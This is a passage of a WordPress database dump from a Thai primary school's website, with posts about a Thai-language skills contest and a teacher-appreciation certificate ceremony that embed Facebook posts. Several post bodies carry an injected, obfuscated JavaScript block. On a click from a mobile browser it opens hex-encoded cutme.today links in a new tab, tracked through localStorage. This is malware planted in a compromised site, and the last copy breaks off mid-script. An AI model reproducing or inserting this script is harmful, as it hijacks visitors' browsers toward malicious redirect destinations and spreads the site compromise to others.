เนื่องในสัปดาห์วันภาษาไทยเเห่งชาติ ประจำปี 2567 ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่','','publish','closed','closed','','%e0%b8%81%e0%b8%a5%e0%b8%b8%e0%b9%88%e0%b8%a1%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%81%e0%b8%b2','','','2024-07-27 12:21:32','2024-07-27 05:21:32','',0,'http://pakhaeng.ssk.in.th/?p=63',0,'post','',0),
(64,1,'2024-07-27 11:00:13','2024-07-27 04:00:13','','451597685_986141419970196_8042590559662739129_n','','inherit','','closed','','451597685_986141419970196_8042590559662739129_n','','','2024-07-27 11:00:13','2024-07-27 04:00:13','',63,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/451597685_986141419970196_8042590559662739129_n.jpg',0,'attachment','image/jpeg',0),
(65,1,'2024-07-27 11:00:21','2024-07-27 04:00:21','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%2Fposts%2Fpfbid04bfLebPyeptUAV338gFDfXqEZ9GJd9sEpJjGWeJWK5GSdaeXc4XmZ5VQShuasdNGl&show_text=true&width=500\" width=\"500\" height=\"741\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กลุ่มเครือข่ายคุณภาพการศึกษา CEO ประจิมโนนคูณ ได้จัดกิจกรรมแข่งขันทักษะภาษาไทย ตามโครงการรักษ์ภาษาไทย เนื่องในสัปดาห์วันภาษาไทยเเห่งชาติ ประจำปี 2567 ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่','','inherit','closed','closed','','63-revision-v1','','','2024-07-27 11:00:21','2024-07-27 04:00:21','',63,'http://pakhaeng.ssk.in.th/?p=65',0,'revision','',0),
(66,1,'2024-07-27 11:02:17','2024-07-27 04:02:17','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%2Fposts%2Fpfbid02TE3CLq9WSAoUG3wxk7XQun1vibyjqQcHg1rpuTEFwXfYmE4RKL5nSCGAzhTZLJUgl&show_text=true&width=500\" width=\"500\" height=\"645\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กิจกรรมมอบเกียรติบัตรการเข้าร่วมกิจกรรมวันไหว้ครูและวันสุนทรภู่','','publish','closed','closed','','%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%a1%e0%b8%ad%e0%b8%9a%e0%b9%80%e0%b8%81%e0%b8%b5%e0%b8%a2%e0%b8%a3%e0%b8%95%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%81','','','2024-07-27 11:45:16','2024-07-27 04:45:16','',0,'http://pakhaeng.ssk.in.th/?p=66',0,'post','',0),
(67,1,'2024-07-27 11:02:13','2024-07-27 04:02:13','','449701918_978142027436802_6634460632883753055_n','','inherit','','closed','','449701918_978142027436802_6634460632883753055_n','','','2024-07-27 11:02:13','2024-07-27 04:02:13','',66,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/449701918_978142027436802_6634460632883753055_n.jpg',0,'attachment','image/jpeg',0),
(68,1,'2024-07-27 11:02:17','2024-07-27 04:02:17','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%2Fposts%2Fpfbid02TE3CLq9WSAoUG3wxk7XQun1vibyjqQcHg1rpuTEFwXfYmE4RKL5nSCGAzhTZLJUgl&show_text=true&width=500\" width=\"500\" height=\"645\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\